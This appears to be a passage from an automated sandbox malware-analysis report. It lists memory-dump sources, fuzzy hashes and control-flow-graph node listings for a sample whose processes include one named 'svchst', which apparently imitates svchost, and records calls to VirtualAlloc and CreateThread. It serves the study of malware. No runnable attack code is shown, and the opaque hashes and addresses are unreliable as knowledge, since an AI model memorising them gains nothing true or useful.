                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed3db14dc988865a9e8f791893ca705422f611ba6a884e1221eb4cbea9fe5d21
                      • Instruction ID: 0f9380427ed6bb4bd94706545c6ad48988507ca185575ba666f7667a5b1e3ec5
                      • Opcode Fuzzy Hash: ed3db14dc988865a9e8f791893ca705422f611ba6a884e1221eb4cbea9fe5d21
                      • Instruction Fuzzy Hash: 2AF04EB590522CCFDB218F20CA48BDCBBB5AB58701F0080DA9909A7261D7350FC5DF61
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491732857.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_58a0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 584f41a928d55bce8cd9cb66fd15f6a4bcfb6b15976cbf49249faeb1bdb0b1c4
                      • Instruction ID: 0f5037ee6c57f3cd71dea47ba86f2b03e616e3032e20f237affe34bde2b5c07f
                      • Opcode Fuzzy Hash: 584f41a928d55bce8cd9cb66fd15f6a4bcfb6b15976cbf49249faeb1bdb0b1c4
                      • Instruction Fuzzy Hash: D8E01234904208EBC708DF94E541A9DBB74FB45304F548199CC0957390C7726E52DB95
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69667660d81b50280e74105d053d08a4c94aabf85e8fc8c5d54717cccfa68140
                      • Instruction ID: eb1336bb64e679a4658dd6333fc5f242d8a8b6fa927fd4dd07ab199c5ce43d70
                      • Opcode Fuzzy Hash: 69667660d81b50280e74105d053d08a4c94aabf85e8fc8c5d54717cccfa68140
                      • Instruction Fuzzy Hash: E4E04E78901218DFDB218F90DD48ADEBBB1BB08300F008199D50AA6264D7311E82DF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6b47341618502016bae03f15748148d145fa64cc0ab94c77cfc790add002f7c
                      • Instruction ID: 62a086cf51e17d56b38045fa7c6484595f713f1f2025b8e00893332812a19ec3
                      • Opcode Fuzzy Hash: f6b47341618502016bae03f15748148d145fa64cc0ab94c77cfc790add002f7c
                      • Instruction Fuzzy Hash: 52D0A7300C5381AFC35107A478186EA7FFC9B43322B46059B9504C50B3C3FC0C45CB21
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32c4c52042fbadb6a1ec3ce3d91a29902a52eabf29f46bc725a07717e85016cd
                      • Instruction ID: 121c572c01e20822ade26cfa33075dab5b1a45eb848340c88a95f915a3b09ad9
                      • Opcode Fuzzy Hash: 32c4c52042fbadb6a1ec3ce3d91a29902a52eabf29f46bc725a07717e85016cd
                      • Instruction Fuzzy Hash: 1BD0A771801208EFC750DFACD50875DBBFCEB05300F8244999904C3350D7700E10D750
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491732857.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_58a0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b00eee32ef6b635d42daf37aff98f77b602305a38c9bcb7a39173aec944edec1
                      • Instruction ID: 31b50f0dc67d284c3d31b3bceae7e0e640d67f3f050202346062c7e84a7ccb1b
                      • Opcode Fuzzy Hash: b00eee32ef6b635d42daf37aff98f77b602305a38c9bcb7a39173aec944edec1
                      • Instruction Fuzzy Hash: A2D05E7194424CABCB50DBA4A5096ACBFB8AB05201F8401A9C845623A0DBB41E54DB91
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78ef462b5b0235a9a0d24d075ecb0abd4112e110626c9e3ba4867a173bb3ec14
                      • Instruction ID: 0c6b2f900cdb600d5dbd930612ba43d22142487755cc47aa975c525dd23da537
                      • Opcode Fuzzy Hash: 78ef462b5b0235a9a0d24d075ecb0abd4112e110626c9e3ba4867a173bb3ec14
                      • Instruction Fuzzy Hash: B8D0C7610042A459E73253E8B00A7693EB85301315FCF0069D758457BBC7F51895CBA5
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 88513ffac5915ab88821f80b637f897cd2873259ae22a1dc866ddf79069cb89b
                      • Instruction ID: 11d5fb4539190823367e3dd41acfc7e14fee0445b8981565135465f069aa99a9
                      • Opcode Fuzzy Hash: 88513ffac5915ab88821f80b637f897cd2873259ae22a1dc866ddf79069cb89b
                      • Instruction Fuzzy Hash: B3B02B3100030487D1201788B00C3773A9C6302311FCD0411430C005B04BF00810C794
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d92a6214a385552bad1c7f18830f7f59047beb886ac1b59b1ccdc3c7c5a558ed
                      • Instruction ID: 251b844607a6b40a3dec07ee59e3c4ea5a1b47ab8b34fe85b063a9fef62e02b9
                      • Opcode Fuzzy Hash: d92a6214a385552bad1c7f18830f7f59047beb886ac1b59b1ccdc3c7c5a558ed
                      • Instruction Fuzzy Hash: 0AC012B0A001049FE720DB64CE88BBA7B75ABC8304F00808AA209A2228CB340C818A24
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5c70067ec46c32c77bd1a16c097f360a7b460336b4eba784427c17ddd295327c
                      • Instruction ID: f6db9cc01c93c517e9cd9d306cf8fefe10ea7a73a8c9b3d97d437fc791e1de6f
                      • Opcode Fuzzy Hash: 5c70067ec46c32c77bd1a16c097f360a7b460336b4eba784427c17ddd295327c
                      • Instruction Fuzzy Hash: A9D0C930905248CFDB20CF88D4447ACBBB2EB49322F52449FE405A7326C77189948F01
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3296f806ce8c6c5ce2d2766ed4bb887b95fccbcb544e0571001d0b43d01c73a0
                      • Instruction ID: 0d2bcf2179f4a1430851d83384dbd88d615e0a5b1b5de170500ca65898e6fb56
                      • Opcode Fuzzy Hash: 3296f806ce8c6c5ce2d2766ed4bb887b95fccbcb544e0571001d0b43d01c73a0
                      • Instruction Fuzzy Hash: 15C00278A46318DBEB208B10D88CB9DBB35BB89705F508085D90E367A5C6701D86CF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9e313d647d09d75220949c54fb5f8391f663511151992902f5dff981560879ef
                      • Instruction ID: 169446f3669bd8cbd01495c6b1798413b7a403922a59b79967828e5bde3306ec
                      • Opcode Fuzzy Hash: 9e313d647d09d75220949c54fb5f8391f663511151992902f5dff981560879ef
                      • Instruction Fuzzy Hash: 74C00274944218CFDF214B50C988B98BB75BB48305F004085951A662658A350994DF10

                      Execution Graph

                      Execution Coverage:9.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:6
                      Total number of Limit Nodes:0
                      execution_graph 23425 49c3e18 23426 49c3e60 VirtualAlloc 23425->23426 23427 49c3ecc 23426->23427 23428 49c4040 23429 49c408d CreateThread 23428->23429 23430 49c410f 23429->23430

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 22a4748-22a4769 1 22a476b 0->1 2 22a4770-22a484f 0->2 1->2 4 22a4f46-22a4f53 2->4 5 22a4855-22a4996 call 22a0da0 2->5 6 22a4f59-22a4f6e 4->6 51 22a4f0f-22a4f39 5->51 52 22a499c-22a49f7 5->52 8 22a5674-22a567d 6->8 10 22a4f7c-22a4f86 8->10 11 22a5683-22a569a 8->11 12 22a4f88 10->12 13 22a4f8d-22a5081 call 22a0da0 10->13 12->13 34 22a50ab 13->34 35 22a5083-22a508f 13->35 36 22a50b1-22a50d1 34->36 37 22a5099-22a509f 35->37 38 22a5091-22a5097 35->38 43 22a50d3-22a512c 36->43 44 22a5131-22a51b1 36->44 39 22a50a9 37->39 38->39 39->36 56 22a5671 43->56 65 22a5208-22a524b call 22a0da0 44->65 66 22a51b3-22a5206 44->66 63 22a4f3b 51->63 64 22a4f43-22a4f44 51->64 60 22a49f9 52->60 61 22a49fc-22a4a07 52->61 56->8 60->61 62 22a4e21-22a4e27 61->62 67 22a4a0c-22a4a2a 62->67 68 22a4e2d-22a4eaa call 22a0170 62->68 63->64 64->4 91 22a5256-22a525f 65->91 66->91 72 22a4a2c-22a4a30 67->72 73 22a4a81-22a4a96 67->73 112 22a4ef9-22a4eff 68->112 72->73 78 22a4a32-22a4a3d 72->78 75 22a4a98 73->75 76 22a4a9d-22a4ab3 73->76 75->76 81 22a4aba-22a4ad1 76->81 82 22a4ab5 76->82 83 22a4a73-22a4a79 78->83 88 22a4ad8-22a4aee 81->88 89 22a4ad3 81->89 82->81 85 22a4a7b-22a4a7c 83->85 86 22a4a3f-22a4a43 83->86 90 22a4aff-22a4b41 85->90 92 22a4a49-22a4a61 86->92 93 22a4a45 86->93 94 22a4af0 88->94 95 22a4af5-22a4afc 88->95 89->88 101 22a4b43-22a4b4f 90->101 102 22a4b55-22a4d25 90->102 97 22a52bf-22a52ce 91->97 99 22a4a68-22a4a70 92->99 100 22a4a63 92->100 93->92 94->95 95->90 103 22a52d0-22a5358 97->103 104 22a5261-22a5289 97->104 99->83 100->99 101->102 110 22a4d89-22a4d9e 102->110 111 22a4d27-22a4d2b 102->111 139 22a54d1-22a54dd 103->139 106 22a528b 104->106 107 22a5290-22a52b9 104->107 106->107 107->97 117 22a4da0 110->117 118 22a4da5-22a4dc6 110->118 111->110 113 22a4d2d-22a4d3c 111->113 115 22a4eac-22a4ef6 112->115 116 22a4f01-22a4f07 112->116 122 22a4d7b-22a4d81 113->122 115->112 116->51 117->118 119 22a4dc8 118->119 120 22a4dcd-22a4dec 118->120 119->120 123 22a4dee 120->123 124 22a4df3-22a4e13 120->124 126 22a4d3e-22a4d42 122->126 127 22a4d83-22a4d84 122->127 123->124 132 22a4e1a 124->132 133 22a4e15 124->133 130 22a4d4c-22a4d6d 126->130 131 22a4d44-22a4d48 126->131 134 22a4e1e 127->134 135 22a4d6f 130->135 136 22a4d74-22a4d78 130->136 131->130 132->134 133->132 134->62 135->136 136->122 141 22a535d-22a5366 139->141 142 22a54e3-22a553e 139->142 143 22a5368 141->143 144 22a536f-22a54c5 141->144 157 22a5540-22a5573 142->157 158 22a5575-22a559f 142->158 143->144 146 22a53ba-22a53fa 143->146 147 22a53ff-22a543f 143->147 148 22a5444-22a5484 143->148 149 22a5375-22a53b5 143->149 159 22a54cb 144->159 146->159 147->159 148->159 149->159 166 22a55a8-22a5662 157->166 158->166 159->139 166->56
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$pq$xbq
                      • API String ID: 0-2466396065
                      • Opcode ID: 68e43f6425cd566b70e717ccd3459a85939b957bde69cb7c680203de2c42d480
                      • Instruction ID: 59bf2e503bdb45d4644f8e2502152b0893aa2aa5476c88fcc2731e6f6374d780
                      • Opcode Fuzzy Hash: 68e43f6425cd566b70e717ccd3459a85939b957bde69cb7c680203de2c42d480
                      • Instruction Fuzzy Hash: C2A2C375E00628CFDB64DF69C984B99BBB2FF89304F1481E9D509AB225DB319E81CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 309 22a8b70-22a8b9e 310 22a8ba0 309->310 311 22a8ba5-22a8cc4 309->311 310->311 314 22a8cd3-22a8cdf 311->314 315 22a8cc6-22a8ccd call 22ab2c2 311->315 316 22a8ce1 314->316 317 22a8ce6-22a8ceb 314->317 315->314 316->317 318 22a8ced-22a8cf9 317->318 319 22a8d23-22a8d6c 317->319 320 22a8cfb 318->320 321 22a8d00-22a8d1e 318->321 328 22a8d6e 319->328 329 22a8d73-22a8f8c 319->329 320->321 323 22aa1d0-22aa1d6 321->323 324 22aa1d8-22aa1f8 323->324 325 22aa201 323->325 324->325 330 22aa202 325->330 328->329 351 22a99bc-22a99c8 329->351 330->330 352 22a99ce-22a9a06 351->352 353 22a8f91-22a8f9d 351->353 361 22a9ab5-22a9abb 352->361 354 22a8f9f 353->354 355 22a8fa4-22a90c9 353->355 354->355 388 22a90cb-22a9103 355->388 389 22a9109-22a9192 355->389 363 22a9a0b-22a9a36 361->363 364 22a9ac1-22a9af9 361->364 373 22a9a42-22a9a5d 363->373 374 22a9cf8-22a9cfe 364->374 375 22a9a5f-22a9a63 373->375 376 22a9a90-22a9ab2 373->376 378 22a9afe-22a9c29 374->378 379 22a9d04-22a9d4c 374->379 375->376 380 22a9a65-22a9a8d 375->380 376->361 427 22a9c2b-22a9c94 378->427 428 22a9c96-22a9c9a 378->428 386 22a9d4e-22a9dc1 379->386 387 22a9dc7-22a9e12 379->387 380->376 386->387 409 22aa19a-22aa1a0 387->409 388->389 415 22a91a1-22a9225 389->415 416 22a9194-22a919c 389->416 411 22aa1a6-22aa1ce 409->411 412 22a9e17-22a9e99 409->412 411->323 431 22a9e9b-22a9eb6 412->431 432 22a9ec1-22a9ecd 412->432 450 22a9227-22a922f 415->450 451 22a9234-22a92b8 415->451 419 22a99ad-22a99b9 416->419 419->351 446 22a9cdf-22a9cf5 427->446 433 22a9ccc-22a9cde 428->433 434 22a9c9c-22a9cca 428->434 431->432 436 22a9ecf 432->436 437 22a9ed4-22a9ee0 432->437 433->446 434->446 436->437 441 22a9ee2-22a9eee 437->441 442 22a9ef3-22a9f02 437->442 448 22aa181-22aa197 441->448 444 22a9f0b-22aa162 442->444 445 22a9f04 442->445 478 22aa16d-22aa179 444->478 445->444 452 22aa03f-22aa0a8 445->452 453 22aa0ad-22aa0ea 445->453 454 22a9f11-22a9f4f 445->454 455 22a9fd1-22aa03a 445->455 456 22a9f54-22a9fcc 445->456 446->374 448->409 450->419 490 22a92ba-22a92c2 451->490 491 22a92c7-22a934b 451->491 452->478 477 22aa133-22aa139 453->477 454->478 455->478 456->478 481 22aa13b-22aa145 477->481 482 22aa0ec-22aa11f 477->482 478->448 481->478 487 22aa121 482->487 488 22aa126-22aa130 482->488 487->488 488->477 490->419 497 22a935a-22a93de 491->497 498 22a934d-22a9355 491->498 504 22a93ed-22a9471 497->504 505 22a93e0-22a93e8 497->505 498->419 511 22a9473-22a947b 504->511 512 22a9480-22a9504 504->512 505->419 511->419 518 22a9513-22a9597 512->518 519 22a9506-22a950e 512->519 525 22a9599-22a95a1 518->525 526 22a95a6-22a962a 518->526 519->419 525->419 532 22a9639-22a96bd 526->532 533 22a962c-22a9634 526->533 539 22a96bf-22a96c7 532->539 540 22a96cc-22a9750 532->540 533->419 539->419 546 22a975f-22a97e3 540->546 547 22a9752-22a975a 540->547 553 22a97f2-22a9876 546->553 554 22a97e5-22a97ed 546->554 547->419 560 22a9878-22a9880 553->560 561 22a9885-22a9909 553->561 554->419 560->419 567 22a990b-22a9913 561->567 568 22a9918-22a999c 561->568 567->419 574 22a99a8-22a99aa 568->574 575 22a999e-22a99a6 568->575 574->419 575->419
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2$`lr$$q
                      • API String ID: 0-2673266359
                      • Opcode ID: ccc8d9854a395b31d83c1b875305d66a5b7d7ad7c53c30a45b15ed5ab5556a2a
                      • Instruction ID: dd3ad1823e1ef3a2c652026a7323f3596898a99ad86af7b2edfaa4f80964d9b1
                      • Opcode Fuzzy Hash: ccc8d9854a395b31d83c1b875305d66a5b7d7ad7c53c30a45b15ed5ab5556a2a
                      • Instruction Fuzzy Hash: 2ED2D4B4E012288FDB65DF69D984B9EBBB6FB88300F1085E9D509A7358DB305E85CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 577 22a46c8-22a46c9 578 22a470b-22a470f 577->578 579 22a46cb-22a46cf 577->579 581 22a4713-22a4716 578->581 580 22a46d1 579->580 580->581 583 22a46d2-22a46e2 580->583 581->580 582 22a4718-22a4719 581->582 584 22a471b-22a471e 582->584 585 22a472e-22a473d 582->585 591 22a46e9-22a46ef 583->591 592 22a46e4 583->592 587 22a4728 584->587 588 22a4720 584->588 589 22a477f-22a484f 585->589 590 22a473f-22a4746 585->590 595 22a472a 587->595 593 22a46ab-22a46ae 588->593 594 22a4722-22a4727 588->594 597 22a4f46-22a4f53 589->597 598 22a4855-22a4996 call 22a0da0 589->598 590->589 592->591 593->577 594->587 595->585 599 22a4f59-22a4f6e 597->599 644 22a4f0f-22a4f39 598->644 645 22a499c-22a49f7 598->645 601 22a5674-22a567d 599->601 603 22a4f7c-22a4f86 601->603 604 22a5683-22a569a 601->604 605 22a4f88 603->605 606 22a4f8d-22a5081 call 22a0da0 603->606 605->606 627 22a50ab 606->627 628 22a5083-22a508f 606->628 629 22a50b1-22a50d1 627->629 630 22a5099-22a509f 628->630 631 22a5091-22a5097 628->631 636 22a50d3-22a512c 629->636 637 22a5131-22a51b1 629->637 632 22a50a9 630->632 631->632 632->629 649 22a5671 636->649 658 22a5208-22a524b call 22a0da0 637->658 659 22a51b3-22a5206 637->659 656 22a4f3b 644->656 657 22a4f43-22a4f44 644->657 653 22a49f9 645->653 654 22a49fc-22a4a07 645->654 649->601 653->654 655 22a4e21-22a4e27 654->655 660 22a4a0c-22a4a2a 655->660 661 22a4e2d-22a4eaa call 22a0170 655->661 656->657 657->597 684 22a5256-22a525f 658->684 659->684 665 22a4a2c-22a4a30 660->665 666 22a4a81-22a4a96 660->666 705 22a4ef9-22a4eff 661->705 665->666 671 22a4a32-22a4a3d 665->671 668 22a4a98 666->668 669 22a4a9d-22a4ab3 666->669 668->669 674 22a4aba-22a4ad1 669->674 675 22a4ab5 669->675 676 22a4a73-22a4a79 671->676 681 22a4ad8-22a4aee 674->681 682 22a4ad3 674->682 675->674 678 22a4a7b-22a4a7c 676->678 679 22a4a3f-22a4a43 676->679 683 22a4aff-22a4b41 678->683 685 22a4a49-22a4a61 679->685 686 22a4a45 679->686 687 22a4af0 681->687 688 22a4af5-22a4afc 681->688 682->681 694 22a4b43-22a4b4f 683->694 695 22a4b55-22a4d25 683->695 690 22a52bf-22a52ce 684->690 692 22a4a68-22a4a70 685->692 693 22a4a63 685->693 686->685 687->688 688->683 696 22a52d0-22a5358 690->696 697 22a5261-22a5289 690->697 692->676 693->692 694->695 703 22a4d89-22a4d9e 695->703 704 22a4d27-22a4d2b 695->704 732 22a54d1-22a54dd 696->732 699 22a528b 697->699 700 22a5290-22a52b9 697->700 699->700 700->690 710 22a4da0 703->710 711 22a4da5-22a4dc6 703->711 704->703 706 22a4d2d-22a4d3c 704->706 708 22a4eac-22a4ef6 705->708 709 22a4f01-22a4f07 705->709 715 22a4d7b-22a4d81 706->715 708->705 709->644 710->711 712 22a4dc8 711->712 713 22a4dcd-22a4dec 711->713 712->713 716 22a4dee 713->716 717 22a4df3-22a4e13 713->717 719 22a4d3e-22a4d42 715->719 720 22a4d83-22a4d84 715->720 716->717 725 22a4e1a 717->725 726 22a4e15 717->726 723 22a4d4c-22a4d6d 719->723 724 22a4d44-22a4d48 719->724 727 22a4e1e 720->727 728 22a4d6f 723->728 729 22a4d74-22a4d78 723->729 724->723 725->727 726->725 727->655 728->729 729->715 734 22a535d-22a5366 732->734 735 22a54e3-22a553e 732->735 736 22a5368 734->736 737 22a536f-22a54c5 734->737 750 22a5540-22a5573 735->750 751 22a5575-22a559f 735->751 736->737 739 22a53ba-22a53fa 736->739 740 22a53ff-22a543f 736->740 741 22a5444-22a5484 736->741 742 22a5375-22a53b5 736->742 752 22a54cb 737->752 739->752 740->752 741->752 742->752 759 22a55a8-22a5662 750->759 751->759 752->732 759->649
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$xbq
                      • API String ID: 0-4091408781
                      • Opcode ID: e67c5d512e003790dc23e9dfa629609e428b53d2e8f0ff7b692291b83212cbe9
                      • Instruction ID: 6023a0d00ef0e3f2ff410bd9e258ebaf99184087799899fddf43d6947974f7bf
                      • Opcode Fuzzy Hash: e67c5d512e003790dc23e9dfa629609e428b53d2e8f0ff7b692291b83212cbe9
                      • Instruction Fuzzy Hash: 06C1F875D016588FDB15DF6AC994ADDBBF2BF89300F1480EAD808AB225DB319E85CF11
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: `lr
                      • API String ID: 0-3235194505
                      • Opcode ID: 58b0b88564cedbc2dec91afb97a2bd4dfa1e616f26b60902f230e7f96a27fb2f
                      • Instruction ID: 65951e048e55130dbc6f2431e40824d48f7fe41244234c4075110e1851b41c52
                      • Opcode Fuzzy Hash: 58b0b88564cedbc2dec91afb97a2bd4dfa1e616f26b60902f230e7f96a27fb2f
                      • Instruction Fuzzy Hash: 6F42CEB4A44229CFCB64DF28C984B99BBB6FF88300F1085E9954DA7355DB30AE85CF54
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: `lr
                      • API String ID: 0-3235194505
                      • Opcode ID: 6afab5592b62788031fc1f5ea84fe50f12fb972b592ab9ce8bfe82f5a2eebf0b
                      • Instruction ID: a8776088a7d9b7a0c73f9b3efe1e8c91d7995340e76b5f35495d01ce9e172ed3
                      • Opcode Fuzzy Hash: 6afab5592b62788031fc1f5ea84fe50f12fb972b592ab9ce8bfe82f5a2eebf0b
                      • Instruction Fuzzy Hash: A651C9B1E016188BEB18CF6BD94478AFAF3BFC8300F14C1AAD508AB259DB740985CF55
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3648d867698f8ab6addb7df37618962ec7087b02f5b9117acd19c693e4f1f9c4
                      • Instruction ID: d07cb6e3b5c0b020890d3a37f0e5b17c41133021452289abaa1d1a7058a85478
                      • Opcode Fuzzy Hash: 3648d867698f8ab6addb7df37618962ec7087b02f5b9117acd19c693e4f1f9c4
                      • Instruction Fuzzy Hash: 64C1F2B4D16268CFDB24CFA9D954BDDBBF2AB48314F1080A9C44DABA58D7749AC4CF40
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6de8042b49dcd340715dab05113b5d9e129c0d36ec33793f6f2429303dbe5d3
                      • Instruction ID: 13bca67629493c0b56d57620114af96b354b60a446983e73bb15c6c03bef8818
                      • Opcode Fuzzy Hash: d6de8042b49dcd340715dab05113b5d9e129c0d36ec33793f6f2429303dbe5d3
                      • Instruction Fuzzy Hash: 3521B671E016089BEB18CFABC95469EBBF6BF88300F14C16A8419AB365EB705956CF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 832 49c3e10-49c3eca VirtualAlloc 834 49c3ecc-49c3ed2 832->834 835 49c3ed3-49c3f07 832->835 834->835
                      APIs
                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 049C3EBA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2596982239.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_49c0000_svchst.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: L
                      • API String ID: 4275171209-2909332022
                      • Opcode ID: 74e5fa120dafb4ecbfe1b53ec898d8ccf9b4d4919738db370ead598c0f4fba49
                      • Instruction ID: 2981bcc87b7b44d4aef52639d1917d2c62576760d7650b480acfe044da408ce4
                      • Opcode Fuzzy Hash: 74e5fa120dafb4ecbfe1b53ec898d8ccf9b4d4919738db370ead598c0f4fba49
                      • Instruction Fuzzy Hash: 263178B8D05258DFCB24CFA9E584ADEFBB1AB49310F24902AE814B7350D335A945CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 838 22ab2c2-22ab2ea 839 22ab2ec 838->839 840 22ab2f1-22ab308 838->840 839->840 842 22ab30b-22ab311 840->842 843 22ab31a-22ab31b 842->843 844 22ab313 842->844 848 22ab330-22ab336 843->848 844->843 845 22ab4ea 844->845 846 22ab33a-22ab4d7 call 22a7780 844->846 847 22ab31d-22ab324 844->847 844->848 849 22ab337-22ab338 844->849 851 22ab4f3-22ab50b 845->851 846->842 877 22ab4dd-22ab4e5 846->877 847->846 850 22ab326-22ab32e 847->850 849->848 850->842 851->842 855 22ab511-22ab517 851->855 855->842 877->842
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$`lr
                      • API String ID: 0-3861299583
                      • Opcode ID: 0c77adf5d46b56223e6e443106197b3e4f7b5dd74cc2857085d56ede7ce6db56
                      • Instruction ID: 16b17042f2fef94749c2327c9f4d9338c410fd383fffc5288cd72e75564e929e
                      • Opcode Fuzzy Hash: 0c77adf5d46b56223e6e443106197b3e4f7b5dd74cc2857085d56ede7ce6db56
                      • Instruction Fuzzy Hash: 06613378E45208DFCB04DFA9E594A9EBBF2FF88300F108469E415AB358DB78594ACF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
